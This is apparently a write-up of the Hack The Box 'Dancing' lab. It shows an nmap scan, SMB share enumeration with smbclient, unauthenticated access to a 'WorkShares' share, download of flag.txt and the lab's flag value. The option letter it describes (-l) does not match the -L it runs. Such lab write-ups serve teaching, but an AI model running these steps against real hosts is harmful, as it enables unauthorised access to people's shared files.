Solving HTB Dancing CTF: A Walkthrough Guide
What does the 3-letter acronym SMB stand for?
Server Message BlockSmb is a protocol. SMB is an abbreviation for “Server Message Block”. It is a communication protocol that supports file and printer sharing over the network. SMB is used to distribute and share files between computers. Windows operating system is widely used.
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -sV 10.129.1.12
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-05 18:42 EST
Nmap scan report for 10.129.1.12
Host is up (0.066s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.81 secondsYou can perform a simple nmap scan without asking us questions.
What port does SMB use to operate at?
445With a little Google, we learn that it works on port 445.
What is the service name for port 445 that came up in our Nmap scan?
microsoft-dsWe found it in the scan.
What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ‘list’ the available shares on Dancing?
-LIn the SMB client, the -l option is used to list and show the shares on the connected server.
How many shares are there on Dancing?
4┌──(root㉿kali)-[/home/kali]
└─# smbclient -L 10.129.1.12
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk When executing the command smbclient -L 10.129.1.12 (replace the IP address with the target IP), you can obtain the list of accessible shares on the target system, which includes names like ‘ADMIN$’, ‘C$’, ‘IPC$’, and ‘WorkShares’ along with their types.
What is the name of the share we are able to access in the end with a blank password?
WorkShares┌──(root㉿kali)-[/home/kali]
└─# smbclient \\\\10.129.1.12\\Workshares -U ADMIN$
Password for [WORKGROUP\ADMİN$]:
Try "help" to get a list of possible commands.
smb: \> We can access the contents of the ‘WorkShares’ share by using the smbclient command with a blank password for authentication. This sharing is open without the need for a password and allows us to discover more.
Once inside, we use the “ls” command and see what happens.
smb: \> cd James.P
smb: \James.P\> ls
. D 0 Thu Jun 3 04:38:03 2021
.. D 0 Thu Jun 3 04:38:03 2021
flag.txt A 32 Mon Mar 29 05:26:57 2021
5114111 blocks of size 4096. 1732282 blocks availableThen we enter the folders by saying “cd”. and we find the flag.
What is the command we can use within the SMB shell to download the files we find?
getsmb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \James.P\> We’ve learned this before. We cannot display it with the “cat” command. We are trying to pull our file with the “get” command.
Submit root flag
5f61c10dffbc77a704d76016a22f1664┌──(root㉿kali)-[/home/kali]
└─# ls
Desktop Downloads Fullscan Pictures Templates Videos
Documents flag.txt Music Public To_agentJ.txt
┌──(root㉿kali)-[/home/kali]
└─# cat flag.txt
5f61c10dffbc77a704d76016a22f1664
We successfully solved the dancing machine, this was our third step. I solved the HTB Dance machine. I carried out critical operations that can be applied in network security and penetration testing processes by sharing “WorkShares” on port 445 via SMB protocol and downloading unencrypted files. This process helped me improve my information security ability by providing the opportunity to address real-world scenarios such as identifying vulnerabilities of target systems, gaining access, and file management.
Keep adopting the “try harder” mentality, keep improving yourself until our next machine.
